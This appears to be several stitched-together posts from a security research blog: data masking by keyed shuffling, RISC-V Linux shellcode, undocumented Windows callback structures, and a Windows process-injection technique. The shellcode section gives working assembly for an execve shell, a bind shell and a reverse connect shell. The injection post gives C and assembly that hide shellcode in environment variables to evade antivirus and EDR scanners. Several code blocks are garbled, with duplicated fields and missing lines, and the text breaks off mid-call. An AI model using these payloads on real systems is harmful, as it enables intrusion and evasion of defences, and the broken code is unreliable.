β
modexp

## Introduction

There are more than four ways to mask data, but these are the main ones to focus on in this post.

1. Lossless Compression
2. Encryption
3. Steganography
4. Shuffling

If we want to detect a compressed or encrypted stream of bytes but canβt rely on a file header for a signature, the best way is by using something like a Chi-Square test. The more uniform the data is, the more likely it is to be compressed or encrypted.

Steganography is better at masking. Some image formats already use lossless compression to reduce the size of files. The PNG format, for example, uses Zlib, and the high compression ratio will result in the file having a high amount of entropy. The GIF format also uses LZW as its compression method but is limited to 256 colours, which results in losing information during the encoding process. Of course, you have the option of parsing GIFs manually, but PNG is probably easier to work with in most image encoding libraries.

## Involutions

In mathematics, an involution, or an involutory function, is a function that is its own inverse; For the following instructions, Iβm merely using this word to describe what they do in practice. Executed once will mask data, and executing again will unmask. These are very common but also very weak when used alone.

```1) eXclusive-OR bitwise operation
xor   eax, -1

2) Bitwise NOT
not   eax
xor   eax, -1

3) Bitwise Negation
neg   eax
imul  eax, -1

4) Circular Shift
shrd  eax, eax, 16
ror   eax, 16
rol   eax, 16
ror   al, 4

5) Byte Swapping
bswap eax
xchg  al, ah
```

The circular shift and byte swapping operations are much closer to a permutation. They could also be used on large arrays in addition to the shuffling.

## Random Shuffling

Letβs imagine you want to shuffle a deck of cards for an online poker game. The shuffling algorithm must be unbiased, and the results canβt be predictable before a game begins. Many who have asked for such an algorithm know of the Fisher-Yates shuffle. Itβs an algorithm for generating a random permutation of a finite sequence. It was proposed by Ronald Fisher and Frank Yates in their book Statistical Tables for Biological, Agricultural and Medical Research published in 1939. Richard Durstenfeld modified the algorithm in 1964, and Donald E. Knuth popularised it in his 1968 book The Art of Computer Programming, hence why some refer to it as the Knuth Shuffle.

The following code in C illustrates how one might shuffle a byte array. Here, weβre using the current time as a seed to initialise the PRNG, which wouldnβt be recommended for a poker game.

```void
fisher_yates_shuffle(void *inbuf, size_t inlen) {
uint8_t *in = (uint8_t*)inbuf;
uint8_t t;

srand(time(0));

for (size_t i = inlen - 1; i > 0; i--) {
uint32_t j = rand() % (i + 1);
uint8_t = in[i];
in[i] = in[j];
in[j] = t;
}
}
```

Obtaining a unique sequence of numbers to shuffle the array is problematic. Most software will use a pseudorandom number generator (PRNG). However, knowing how to generate the same sequence of numbers used to shuffle a deck of cards allows us to determine where every card is and even reverse the process. But thatβs precisely what makes Fisher-Yates useful for masking. We want to unshuffle our masked data later; itβs just that rand() isnβt suitable. We need something else.

## Keyed/Seeded/Deterministic Shuffling

Apart from rand() being weak for shuffling, unshuffling the array would require starting with the last number returned by it. rand() doesnβt support this type of random access, therefore our unshuffling algorithm would be required to generate the exact same sequence of numbers and store each one in memory before starting to unshuffle. We need a function that can produce deterministic values based on a seed or key. Seeded or keyed shuffling and unshuffling is really what we need.

A PRNG is also a Deterministic Random Bit Generator (DRBG). The DRBG/PRNG-generated sequence is not truly random because an initial value, called the PRNGβs seed (which may include truly random values), entirely determines the output bits generated by it. Therefore, we can replace rand() with a stream cipher like RC4, ChaCha, or a block cipher like AES in Counter (CTR) mode and generate deterministic values.

NIST has defined how to construct a DRBG from CTR mode in SP 800-90Ar1, but itβs unnecessary to use this for masking. Rather than implement a DRBG, we just need to encrypt the range index using a secret key and then derive an unbiased number within that range from the ciphertext. The following code tries to demonstrate how it might be done in practice.

```#if defined(_WIN64)
//
// SPECK128-256
//
#define WORDLEN 64
#define PRNG_MAX_INT (INT64_MAX + 1)
#define ENCRYPT_KEY_LEN 32
#define ENCRYPT_BLOCK_LEN 16
#define R(v,n)(((v)>>(n))|((v)<<(64-(n))))
typedef unsigned long long W;

void
encrypt(void*mk,void*p){
W k[4],*x=(W*)p,i,t;

for (i=0; i<4; i++) k[i] = ((W*)mk)[i];

for (i=0; i<34; i++) {
x[1] = (R(x[1], 8) + x[0]) ^ k[0],
x[0] = R(x[0], 61) ^ x[1],
k[1] = (R(k[1], 8) + k[0]) ^ i,
k[0] = R(k[0], 61) ^ k[1];
t = k[1], k[1] = k[2], k[2] = k[3], k[3] = t;
}
}

#else
//
// SPECK64-128
//
#define WORDLEN 32
#define PRNG_MAX_INT (INT32_MAX + 1)
#define ENCRYPT_KEY_LEN 16
#define ENCRYPT_BLOCK_LEN 8
#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
typedef unsigned int W;

void
encrypt(void* mk, void* p) {
W k[4],*x=(W*)p,i,t;

for (i=0; i<4; i++) k[i] = ((W*)mk)[i];

for (i=0; i<27; i++) {
x[0] = (R(x[0], 8) + x[1]) ^ k[0],
x[1] = R(x[1], 29) ^ x[0],
t = k[3],
k[3] = (R(k[1], 8) + k[0]) ^ i,
k[0] = R(k[0], 29) ^ k[3],
k[1] = k[2], k[2]=t;
}
}
#endif

W
prng_word(void *key, W max) {
W r, x[2], ctr = 1, d = ((-max) / max) + 1;
if (d == 0) return 0;

for (;;) {
x[0] = max;
x[1] = ctr++;

encrypt(key, x);

r = x[0] / d;
if (r < max) return r;
}
}

void
shuffle(void *seed, void *inbuf, size_t inlen) {
uint8_t *in = (uint8_t*)inbuf;

for (size_t i = inlen - 1; i > 0; i--) {
uint32_t j = prng_word(seed, (i + 1));
uint8_t t = in[i];
in[i] = in[j];
in[j] = t;
}
}

void
unshuffle(void *seed, void *inbuf, size_t inlen) {
uint8_t *in = (uint8_t*)inbuf;

for (size_t i = 0; i < inlen; i++) {
uint32_t j = prng_word(seed, (i + 1));
uint8_t t = in[i];
in[i] = in[j];
in[j] = t;
}
}
```

There are times when elements of the array will remain in the same position after shuffling. This typically happens with small arrays. In that case, something else is required for masking. Now, if you know of a way to fix that, feel free to leave a comment or drop me an email.

## Summary

Shuffling doesnβt provide any confidentiality for the masked data like encryption does and doesnβt reduce its size like compression does. However, shuffling a large enough array using a secure cipher and secret key to generate a sequence of numbers can probably make it difficult to recover the original data without the key used to initialise the PRNG. That seems helpful in masking data and better than an XOR. But of course, something like this is in no way intended or implied to be a suitable replacement for encryption and shouldnβt be used for any critical information!

odzhan

modexp

# Shellcode: Linux on RISC-V 64-Bit

RISC-V (pronounced βrisk-fiveβ ) is an open standard instruction set architecture (ISA) based on established reduced instruction set computer (RISC) principles. Unlike most other ISA designs, RISC-V is provided under open source licenses that do not require fees to use.

To learn more about the RISC-V architecture, I recently bought a StarFive VisionFive Single Board computer. Itβs slightly more expensive than the RPI that runs on ARM, but itβs the closest thing to an RPI we have available right now. It uses the SiFiveβs U74 64-bit RISC-V processor core which is similar to the ARM Cortex-A55. Readers without access to a board like this have the option of using QEMU.

You can view the shellcodes here.

The RISC-V ISA (excluding extensions) is of course much smaller than the ARM ISA, but that also makes it easier to learn IMHO. The reduced set of instructions is more suitable for beginners learning their first assembly language. From a business perspective, and I accept Iβm not an expert on such issues, the main advantages of RISC-V over ARM is that itβs open source, has no licensing fees and is sanction-free. For those reasons, it may very well become more popular than ARM in future. Weβll have to wait and see.

Β  X86 (AMD64) ARM64 RISC-V 64
Registers RAX-R15 X0-X31 A0-A31
Syscall Register RAX X8 A7
Return Register RAX X0 A0
Zero Register N/A XMR X0
Data Transfer (Register) MOV MOV MV
Data Transfer (Immediate) MOV MOV LI
Execute System Call SYSCALL SVC ECALL

## Execute /bin/sh

```    # 48 bytes

.include "include.inc"

.global _start
.text

_start:
# execve("/bin/sh", NULL, NULL);
li     a7, SYS_execve
mv     a2, x0           # NULL
mv     a1, x0           # NULL
li     a3, BINSH        # "/bin/sh"
sd     a3, (sp)         # stores string on stack
mv     a0, sp
ecall
```

## Execute Command

```    # 112 bytes

.include "include.inc"

.global _start
.text

_start:
# execve("/bin/sh", {"/bin/sh", "-c", cmd, NULL}, NULL);
addi   sp, sp, -64           # allocate 64 bytes of stack
li     a7, SYS_execve
li     a0, BINSH             # a0 = "/bin/sh\0"
sd     a0, (sp)              # store "/bin/sh" on the stack
mv     a0, sp
li     a1, 0x632D            # a1 = "-c"
sd     a1, 8(sp)             # store "-c" on the stack
la     a2, cmd               # a2 = cmd
sd     a0, 16(sp)
sd     a1, 24(sp)
sd     a2, 32(sp)
sd     x0, 40(sp)
addi   a1, sp, 16            # a1 = {"/bin/sh", "-c", cmd, NULL}
mv     a2, x0                # penv = NULL
ecall
cmd:
.asciz "echo Hello, World!"
```

## Bind Shell

```    # 176 bytes

.include "include.inc"

.equ PORT, 1234

.global _start
.text

_start:

# s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
li     a7, SYS_socket
li     a2, IPPROTO_IP
li     a1, SOCK_STREAM
li     a0, AF_INET
ecall

mv     a3, a0

# bind(s, &sa, sizeof(sa));
li     a7, SYS_bind
li     a2, 16
li     a1, (((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
sd     a1, (sp)
sd     x0, 8(sp)
mov    a1, sp
ecall

# listen(s, 1);
li     a7, SYS_listen
li     a1, 1
mv     a0, a3
ecall

# r = accept(s, 0, 0);
li     a7, SYS_accept
mv     a2, x0
mv     a1, x0
mv     a0, a3
ecall

mv     a4, a0

# in this order
#
# dup3(s, STDERR_FILENO, 0);
# dup3(s, STDOUT_FILENO, 0);
# dup3(s, STDIN_FILENO,  0);
li     a7, SYS_dup3
li     a1, STDERR_FILENO + 1
c_dup:
mv     a0, a4
ecall
bne    a1, zero, c_dup

# execve("/bin/sh", NULL, NULL);
li     a7, SYS_execve
mv     a2, x0
mv     a1, x0
li     a0, BINSH
sd     a0, (sp)
mv     a0, sp
ecall
```

## Reverse Connect Shell

```    # 140 bytes

.include "include.inc"

.equ PORT, 1234
.equ HOST, 0x0100007F # 127.0.0.1

.global _start
.text

_start:

# s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
li      a7, SYS_socket
li      a2, IPPROTO_IP
li      a1, SOCK_STREAM
li      a0, AF_INET
ecall

mv      a3, a0       # a3 = s

# connect(s, &sa, sizeof(sa));
li      a7, SYS_connect
li      a2, 16
li      a1, ((HOST << 32) | ((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
sd      a1, (sp)
mv      a1, sp       # a1 = &sa
ecall

# in this order
#
# dup3(s, STDERR_FILENO, 0);
# dup3(s, STDOUT_FILENO, 0);
# dup3(s, STDIN_FILENO,  0);
li      a7, SYS_dup3
li      a1, STDERR_FILENO + 1
c_dup:
mv      a2, x0
mv      a0, a3
ecall
bne     a1, zero, c_dup

# execve("/bin/sh", NULL, NULL);
li      a7, SYS_execve
li      a0, BINSH
sd      a0, (sp)
mv      a0, sp
ecall
```

odzhan

modexp

# Windows Data Structures and Callbacks, Part 1

Windows Data Structures and Callbacks, Part 1

## 1. Introduction

A process can contain thousands of pointers to executable code, some of which are stored in opaque, but writeable data structures only known to Microsoft, a handful of third party vendors and of course bad guys that want to hide malicious code from memory scanners. This post documents what some of the data structures contain rather than PoCs to demonstrate code redirection or evasion, which I probably wonβt discuss much anymore. The names of some structure fields wonβt be entirely accurate, but feel free to drop me an email if you think something needs correcting. No, I donβt have access to source code. These structures were reverse engineered or can be found on MSDN.

## 2. Dynamic Function Table List

ntdll!RtlpDynamicFunctionTable contains DYNAMIC_FUNCTION_TABLE entries and callback functions for a range of memory that can be installed using ntdll!RtlInstallFunctionTableCallback. ntdll!RtlGetFunctionTableListHead returns a pointer to the list and since NTDLL.dll uses the same base address for each process, you can read entries from a remote process very easily.

```typedef enum _FUNCTION_TABLE_TYPE {
RF_SORTED,
RF_UNSORTED,
RF_CALLBACK
} FUNCTION_TABLE_TYPE;

typedef PRUNTIME_FUNCTION (CALLBACK *PGET_RUNTIME_FUNCTION_CALLBACK)
(ULONG_PTR ControlPc, PVOID Context);

typedef struct _DYNAMIC_FUNCTION_TABLE {
DWORD64                         TableIdentifier;
LARGE_INTEGER                   TimeStamp;
PGET_RUNTIME_FUNCTION_CALLBACK  Callback;
PCWSTR                          OutOfProcessCallbackDll;
FUNCTION_TABLE_TYPE             Type;
ULONG                           EntryCount;
ULONG64                         UnknownStruct[3];  // referenced by RtlAvlInsertNodeEx
} DYNAMIC_FUNCTION_TABLE, *PDYNAMIC_FUNCTION_TABLE;
```

## 3. Event Tracing

Microsoft recommends against using it, but sechost!SetTraceCallback can still receive ETW events. Entries of type EVENT_CALLBACK_ENTRY are located at sechost!EtwpEventCallbackList.

```typedef VOID (CALLBACK PEVENT_CALLBACK)(PEVENT_TRACE pEvent);

ULONG WMIAPI SetTraceCallback(
LPCGUID         pGuid,
PEVENT_CALLBACK EventCallback);

typedef struct _EVENT_CALLBACK_ENTRY {
GUID            ProviderId;
PEVENT_CALLBACK Callback;
} EVENT_CALLBACK_ENTRY, *PEVENT_CALLBACK_ENTRY;
```

```typedef struct _LDR_DLL_LOADED_NOTIFICATION_DATA {
ULONG           Flags;             // Reserved.
PUNICODE_STRING FullDllName;       // The full path name of the DLL module.
PUNICODE_STRING BaseDllName;       // The base file name of the DLL module.
PVOID           DllBase;           // A pointer to the base address for the DLL in memory.
ULONG           SizeOfImage;       // The size of the DLL image, in bytes.

ULONG           Flags;             // Reserved.
PUNICODE_STRING FullDllName;       // The full path name of the DLL module.
PUNICODE_STRING BaseDllName;       // The base file name of the DLL module.
PVOID           DllBase;           // A pointer to the base address for the DLL in memory.
ULONG           SizeOfImage;       // The size of the DLL image, in bytes.

PVOID                       Context);

LIST_ENTRY                     List;
PVOID                          Context;

ULONG                          Flags,
PVOID                          Context,

```

## 5. Secure Memory

Kernel drivers can secure user-space memory using ntoskrnl!MmSecureVirtualMemory. This prevents the memory being freed or having its page protection made more restrictive. i.e PAGE_NOACCESS. To monitor changes, developers can install a callback using AddSecureMemoryCacheCallback. Entries of type RTL_SEC_MEM_ENTRY are located at ntdll!RtlpSecMemListHead.

```typedef BOOLEAN (CALLBACK *PSECURE_MEMORY_CACHE_CALLBACK)(PVOID, SIZE_T);

typedef struct _RTL_SEC_MEM_ENTRY {
ULONG                         Revision;
ULONG                         Reserved;
PSECURE_MEMORY_CACHE_CALLBACK Callback;
} RTL_SEC_MEM_ENTRY, *PRTL_SEC_MEM_ENTRY;
```

## 6. Configuration Manager (CM)

A process can register for Plug and Play events using cfgmgr32!CM_Register_Notification. Microsoft recommends legacy systems up to Windows 7 use RegisterDeviceNotification, but I didnβt examine that function. Notification entries of type _HCMNOTIFICATION are located at cfgmgr32!EventSystemClientList. _CM_CALLBACK_INFO is the structure sent to \Device\DeviceApi\CMNotify when a process registers a callback. As you can see from the WnfSubscription field, it uses the Windows Notification Facility (WNF) to receive events.

```typedef DWORD (CALLBACK *PCM_NOTIFY_CALLBACK)(
_In_opt_ PVOID                 Context,
_In_     CM_NOTIFY_ACTION      Action,
_In_     PCM_NOTIFY_EVENT_DATA EventData,
_In_     DWORD                 EventDataSize);

typedef struct _CM_CALLBACK_INFO {
WCHAR              ModulePath[MAX_PATH];
CM_NOTIFY_FILTER   EventFilter;
};

USHORT                  Signature;             // 0xF097
SRWLOCK                 SharedLock;
CONDITION_VARIABLE      ConditionVar;
LIST_ENTRY              EventSystemClientList;
LIST_ENTRY              EventSystemPendingClients;
BOOL                    Active;
BOOL                    InProgress;
CM_NOTIFY_FILTER        EventFilter;
PCM_NOTIFY_CALLBACK     Callback;
PVOID                   Context;
HANDLE                  NotifyFile;    // handle for \Device\DeviceApi\CMNotify
PWNF_USER_SUBSCRIPTION  WnfSubscription;
```

## 7. Vectored Exception Handling (VEH)

When kernelbase!KernelBaseBaseDllInitialize is executed, it installs an exception handler kernelbase!UnhandledExceptionFilter via SetUnhandledExceptionFilter. Unless a Vectored Exception Handler (VEH) is installed afterwards, this is the top level handler executed for any faults that occur. VEH callbacks installed using AddVectoredExceptionHandler or AddVectoredContinueHandler are located at ntdll!LdrpVectorHandlerList

```// vectored handler list
typedef struct _RTL_VECTORED_HANDLER_LIST {
SRWLOCK                    Lock;
LIST_ENTRY                  List;
} RTL_VECTORED_HANDLER_LIST, *PRTL_VECTORED_HANDLER_LIST;

// exception handler entry
typedef struct _RTL_VECTORED_EXCEPTION_ENTRY {
LIST_ENTRY                  List;
PULONG_PTR                  Flag;           // some flag related to CFG
ULONG                       RefCount;
PVECTORED_EXCEPTION_HANDLER VectoredHandler;
} RTL_VECTORED_EXCEPTION_ENTRY, *PRTL_VECTORED_EXCEPTION_ENTRY;
```

## 8. Windows Error Reporting (WER)

Windows provides API to enable application recovery, dumping process memory and generating reports via the WER service. WER settings for a process can be located within the Process Environment Block (PEB) at WerRegistrationData.

Iβll discuss structures separately, but for the few that arenβt. Signature is set internally by kernelbase!WerpInitPEBStore and simply contains the string βPEB_SIGNATUREβ. AppDataRelativePath is set by WerRegisterAppLocalDump. kernelbase!RegisterApplicationRestart can be used to set RestartCommandLine, which is used as the command line when the process is to be eh..restarted.

```typedef struct _WER_PEB_HEADER_BLOCK {
LONG                 Length;
WCHAR                Signature[16];
WCHAR                AppDataRelativePath[64];
WCHAR                RestartCommandLine[RESTART_MAX_CMD_LINE];
WER_RECOVERY_INFO    RecoveryInfo;
PWER_GATHER          Gather;
PWER_RUNTIME_DLL     RuntimeDll;
PWER_DUMP_COLLECTION DumpCollection;
LONG                 GatherCount;
LONG                 DumpCount;
LONG                 Flags;
PVOID                Reserved;
```

### 8.2 Recovery Information

A recovery callback can be installed using kernel32!RegisterApplicationRecoveryCallback. kernelbase!GetApplicationRecoveryCallback will read the Callback, Parameter, PingInterval and Flags from a remote process. kernel32!ApplicationRecoveryFinished can read if the Finished event is signalled. ApplicationRecoveryInProgress will determine if the InProgress event is signalled. Started is a handle, but Iβm unsure what itβs for exactly.

```typedef struct _WER_RECOVERY_INFO {
ULONG                Length;
PVOID                Callback;
PVOID                Parameter;
HANDLE               Started;
HANDLE               Finished;
HANDLE               InProgress;
LONG                 LastError;
BOOL                 Successful;
DWORD                PingInterval;
DWORD                Flags;
} WER_RECOVERY_INFO, *PWER_RECOVERY_INFO;
```

### 8.3 Gathers

As part of a report created by WER, kernelbase!WerRegisterMemoryBlock inserts information about a range of memory that should be included. Itβs also possible to exclude a range of memory using kernelbase!WerRegisterExcludedMemoryBlock, which internally sets bit 15 of the Flags in a WER_GATHER structure. Files that might otherwise be excluded from a report can also be saved via kernelbase!WerRegisterFile.

```typedef struct _WER_FILE {
USHORT               Flags;
WCHAR                Path[MAX_PATH];
} WER_FILE, *PWER_FILE;

typedef struct _WER_MEMORY {
ULONG                Size;
} WER_MEMORY, *PWER_MEMORY;

typedef struct _WER_GATHER {
PVOID                Next;
USHORT               Flags;
union {
WER_FILE           File;
WER_MEMORY         Memory;
} v;
} WER_GATHER, *PWER_GATHER;
```

### 8.4 Custom Meta Data

Applications can register custom meta data using kernelbase!WerRegisterCustomMetadata.

```typedef struct _WER_METADATA {
PVOID                Next;
WCHAR                Key[64];
WCHAR                Value[128];
```

### 8.5 Runtime DLL

Developers might want to customize the reporting process and thatβs what kernelbase!WerRegisterRuntimeExceptionModule is for. It inserts the path of DLL into the registration data thatβs loaded by werfault.exe once an exception occurs. In the WER_RUNTIME_DLL structure, MAX_PATH is used for CallbackDllPath, but the correct length for the structure and DLL should be read from the Length field.

```typedef struct _WER_RUNTIME_DLL {
PVOID                Next;
ULONG                Length;
PVOID                Context;
WCHAR                CallbackDllPath[MAX_PATH];
} WER_RUNTIME_DLL, *PWER_RUNTIME_DLL;
```

### 8.6 Dump Collections

If more than one process is required for dumping, an application can use kernelbase!WerRegisterAdditionalProcess to specify the process and thread ids. Iβm open to correction, but it appears that only one thread per process is allowed by the API.

```typedef struct _WER_DUMP_COLLECTION {
PVOID                Next;
DWORD                ProcessId;
} WER_DUMP_COLLECTION, *PWER_DUMP_COLLECTION;
```

Finally, the main heap header used for dynamic allocation of memory for WER structures. The signature here should contain a string βHEAP_SIGNATUREβ. The mutex is simply for exclusive access during allocations. FreeHeap may be inaccurate, but it appears to be used to improve performance of memory allocations. Instead of requesting a new block of memory from the OS, WER functions can use from this block if possible.

```typedef struct _WER_HEAP_MAIN_HEADER {
WCHAR                Signature[16];
HANDLE               Mutex;
PVOID                FreeHeap;
ULONG                FreeCount;
```

The WER service could be a point of privilege escalation and lateral movement. Thereβs potential to use it for exfiltration of sensitive data by modifying information in the registry settings. An attacker may be capable of dumping a process and having a report sent to a server they control using the CorporateWERServer setting. They might also use their own public key to encrypt this data and prevent recovery of what exactly is being gathered. This is all hypothetical of course and I donβt know if it can actually be used for this.

data_structs_part1

odzhan

modexp

# Windows Process Injection: Command Line and Environment Variables

Windows Process Injection: Command Line and Environment Variables

## 1. Introduction

There are many ways to load shellcode into the address space of a process, but knowing precisely where itβs stored in memory is a bigger problem when we need to execute it. Ideally, a Red Teamer will want to locate their code with the least amount of effort, avoiding memory scrapers/scanners that might alert an antivirus or EDR solution. Adam discussed some ways to avoid using VirtualAllocEx and WriteProcessMemory in a blog post, Inserting data into other processesβ address space. Red Teamers are known to create a new process before injecting data, but Iβve yet to see any examples of using the command line or environment variables to assist with this.

This post examines how CreateProcessW might be used to both start a new process AND inject data simultaneously. Memory for where the data resides will initially have Read-Write (RW) permissions, but this can be changed to Read-Write-Execute (RWX) using VirtualProtectEx. Since notepad will be used to demonstrate these techniques, Wordwarping / EM_SETWORDBREAKPROC is used to execute the shellcode. The main structure of memory being modified for these examples is RTL_USER_PROCESS_PARAMETERS that contains the Environment block, the CommandLine and C RuntimeData information, all of which can be controlled by an actor prior to creation of a new process.

```typedef struct _RTL_USER_PROCESS_PARAMETERS {
ULONG MaximumLength;                            //0x0
ULONG Length;                                   //0x4
ULONG Flags;                                    //0x8
ULONG DebugFlags;                               //0xc
PVOID ConsoleHandle;                            //0x10
ULONG ConsoleFlags;                             //0x18
PVOID StandardInput;                            //0x20
PVOID StandardOutput;                           //0x28
PVOID StandardError;                            //0x30
CURDIR CurrentDirectory;                        //0x38
UNICODE_STRING DllPath;                         //0x50
UNICODE_STRING ImagePathName;                   //0x60
UNICODE_STRING CommandLine;                     //0x70
PVOID Environment;                              //0x80
ULONG StartingX;                                //0x88
ULONG StartingY;                                //0x8c
ULONG CountX;                                   //0x90
ULONG CountY;                                   //0x94
ULONG CountCharsX;                              //0x98
ULONG CountCharsY;                              //0x9c
ULONG FillAttribute;                            //0xa0
ULONG WindowFlags;                              //0xa4
ULONG ShowWindowFlags;                          //0xa8
UNICODE_STRING WindowTitle;                     //0xb0
UNICODE_STRING DesktopInfo;                     //0xc0
UNICODE_STRING ShellInfo;                       //0xd0
UNICODE_STRING RuntimeData;                     //0xe0
RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32];  //0xf0
ULONG EnvironmentSize;                          //0x3f0
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
```

## 2. Shellcode

User-supplied shellcodes that contain two consecutive null bytes (\x00\x00) would require an encoder and decoder, such as Base64. The following code resolves the address of CreateProcessW and executes a command supplied by the word break callback. The PoC will set the command using WM_SETTEXT.

```      bits 64

Β Β Β Β Β Β %include "include.inc"

struc stk_mem
.hs                   resb home_space_size

.bInheritHandles      resq 1
.dwCreationFlags      resq 1
.lpEnvironment        resq 1
.lpCurrentDirectory   resq 1
.lpStartupInfo        resq 1
.lpProcessInformation resq 1

.procinfo             resb PROCESS_INFORMATION_size
.startupinfo          resb STARTUPINFO_size
endstruc

Β Β Β Β Β Β %define stk_size ((stk_mem_size + 15) & -16) - 8

Β Β Β Β Β Β %ifndef BIN
global createproc
Β Β Β Β Β Β %endif

; void createproc(WCHAR cmd[]);
createproc:
; save non-volatile registers
pushx  rsi, rbx, rdi, rbp

; allocate stack memory for arguments + home space
xor    eax, eax
mov    al, stk_size
sub    rsp, rax

; save pointer to buffer
push   rcx

push   TEB.ProcessEnvironmentBlock
pop    r11
mov    rax, [gs:r11]
mov    rax, [rax+PEB.Ldr]
jmp    scan_dll
next_dll:
scan_dll:
mov    rbx, [rdi+LDR_DATA_TABLE_ENTRY.DllBase]

IMAGE_DIRECTORY_ENTRY_EXPORT * IMAGE_DATA_DIRECTORY_size + \
TEB.ProcessEnvironmentBlock]
jecxz  next_dll              ; if no exports, try next DLL in list
; rsi = offset IMAGE_EXPORT_DIRECTORY.Name
lea    rsi, [rbx+rcx+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
lodsd                        ; eax = NumberOfNames
xchg   eax, ecx
jecxz  next_dll              ; if no names, try next DLL in list

lodsd
xchg   eax, r8d              ;
add    r8, rbx               ; r8 = RVA2VA(r8, rbx)
lodsd
xchg   eax, ebp              ;
add    rbp, rbx              ; rbp = RVA2VA(rbp, rbx)
lodsd
xchg   eax, r9d
add    r9, rbx               ; r9 = RVA2VA(r9, rbx)
find_api:
mov    esi, [rbp+rcx*4-4]    ; rax = AddressOfNames[rcx-1]
xor    eax, eax
cdq
hash_api:
lodsb
ror    edx, 8
dec    al
jns    hash_api
cmp    edx, 0x1b929a47       ; CreateProcessW
loopne find_api              ; loop until found or no names left

movzx  eax, word[r9+rcx*2]   ; eax = AddressOfNameOrdinals[rcx]
mov    eax, [r8+rax*4]

; CreateProcess(NULL, cmd, NULL, NULL,
;   FALSE, 0, NULL, &si, &pi);
pop    rdx           ; lpCommandLine = buffer for Edit
xor    r8, r8        ; lpProcessAttributes = NULL
xor    r9, r9        ; lpThreadAttributes = NULL
xor    eax, eax
mov    [rsp+stk_mem.bInheritHandles     ], rax ; bInheritHandles      = FALSE
mov    [rsp+stk_mem.dwCreationFlags     ], rax ; dwCreationFlags      = 0
mov    [rsp+stk_mem.lpEnvironment       ], rax ; lpEnvironment        = NULL
mov    [rsp+stk_mem.lpCurrentDirectory  ], rax ; lpCurrentDirectory   = NULL

lea    rdi, [rsp+stk_mem.procinfo       ]
mov    [rsp+stk_mem.lpProcessInformation], rdi ; lpProcessInformation = &pi

lea    rdi, [rsp+stk_mem.startupinfo    ]
mov    [rsp+stk_mem.lpStartupInfo       ], rdi ; lpStartupInfo        = &si

xor    ecx, ecx
push   STARTUPINFO_size
pop    rax
stosd                         ; si.cb = sizeof(STARTUPINFO)
sub    rax, 4
xchg   eax, ecx
rep    stosb
call   rbx

; deallocate stack
xor    eax, eax
mov    al, stk_size
xor    eax, eax

; restore non-volatile registers
popx   rsi, rbx, rdi, rbp
ret
```

## 3. Environment Variables

Part of Unix since 1979 and MS-DOS/Windows since 1982. According to MSDN, the maximum size of a user-defined variable is 32,767 characters. 32KB should be sufficient for most shellcode, but if not, you have the option of using multiple variables for anything else.

Thereβs a few ways to inject using variables, but I found the easiest approach to be setting one in the current process with SetEnvironmentVariable, and then allowing CreateProcessW to transfer or propagate all of them to the new process by setting the lpEnvironment parameter to NULL.

```    // generate random name
srand(time(0));
for(i=0; i<MAX_NAME_LEN; i++) {
name[i] = ((rand() % 2) ? L'a' : L'A') + (rand() % 26);
}

// set variable in this process space with our shellcode
SetEnvironmentVariable(name, (PWCHAR)WINEXEC);

// create a new process using
// environment variables from this process
ZeroMemory(&si, sizeof(si));
si.cb          = sizeof(si);
si.dwFlags     = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWDEFAULT;

FALSE, 0, NULL, NULL, &si, &pi);
```

Variable names are stored in memory alphabetically and will appear in the same order for the new process so long as lpEnvironment for CreateProcess is set to NULL. The PoC here will locate the address of the shellcode inside the current environment block, then subtract the base address to obtain the relative virtual address (RVA).

```// return relative virtual address of environment block
DWORD get_var_rva(PWCHAR name) {
PVOID  env;
PWCHAR str, var;
DWORD  rva = 0;

// find the offset of value for environment variable
env = NtCurrentTeb()->ProcessEnvironmentBlock->ProcessParameters->Environment;
str = (PWCHAR)env;

while(*str != 0) {
// our name?
if(wcsncmp(str, name, MAX_NAME_LEN) == 0) {
var = wcsstr(str, L"=") + 1;
// calculate RVA of value
rva = (PBYTE)var - (PBYTE)env;
break;
}
str += wcslen(str) + 1;
}
return rva;
}
```

Once we have the RVA for local process, read the address of environment block in remote process and add the RVA.

```// get the address of environment block
PVOID var_get_env(HANDLE hp, PDWORD envlen) {
NTSTATUS                    nts;
PROCESS_BASIC_INFORMATION   pbi;
RTL_USER_PROCESS_PARAMETERS upp;
PEB                         peb;
ULONG                       len;
SIZE_T                      rd;

// get the address of PEB
nts = NtQueryInformationProcess(
hp, ProcessBasicInformation,
&pbi, sizeof(pbi), &len);

&peb, sizeof(PEB), &rd);

// get the address of Environment block
hp, peb.ProcessParameters,
&upp, sizeof(RTL_USER_PROCESS_PARAMETERS), &rd);

*envlen = upp.EnvironmentSize;
return upp.Environment;
}
```

The full routine will copy the user-supplied command to the Edit control and the shellcode will receive this when the word break callback is executed. You donβt need to use Notepad, but I just wanted to avoid the usual methods of executing code via RtlCreateUserThread or CreateRemoteThread. Figure 1 shows the shellcode stored as an environment variable. See var_inject.c for more detals.

Figure 1. Environment variable of new process containing shellcode.

```void var_inject(PWCHAR cmd) {
STARTUPINFO         si;
PROCESS_INFORMATION pi;
WCHAR               name[MAX_PATH]={0};
INT                 i;
PVOID               va;
DWORD               rva, old, len;
PVOID               env;
HWND                npw, ecw;

// generate random name
srand(time(0));
for(i=0; i<MAX_NAME_LEN; i++) {
name[i] = ((rand() % 2) ? L'a' : L'A') + (rand() % 26);
}

// set variable in this process space with our shellcode
SetEnvironmentVariable(name, (PWCHAR)WINEXEC);

// create a new process using
// environment variables from this process
ZeroMemory(&si, sizeof(si));
si.cb          = sizeof(si);
si.dwFlags     = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWDEFAULT;

FALSE, 0, NULL, NULL, &si, &pi);

// wait for process to initialize
// if you don't wait, there can be a race condition
WaitForInputIdle(pi.hProcess, INFINITE);

// the command to execute is just pasted into the notepad
// edit control.
ecw = FindWindowEx(npw, NULL, L"Edit", NULL);
SendMessage(ecw, WM_SETTEXT, 0, (LPARAM)cmd);

// get the address of environment block in new process
// then calculate the address of shellcode
env = var_get_env(pi.hProcess, &len);
va = (PBYTE)env + get_var_rva(name);

// set environment block to RWX
VirtualProtectEx(pi.hProcess, env,

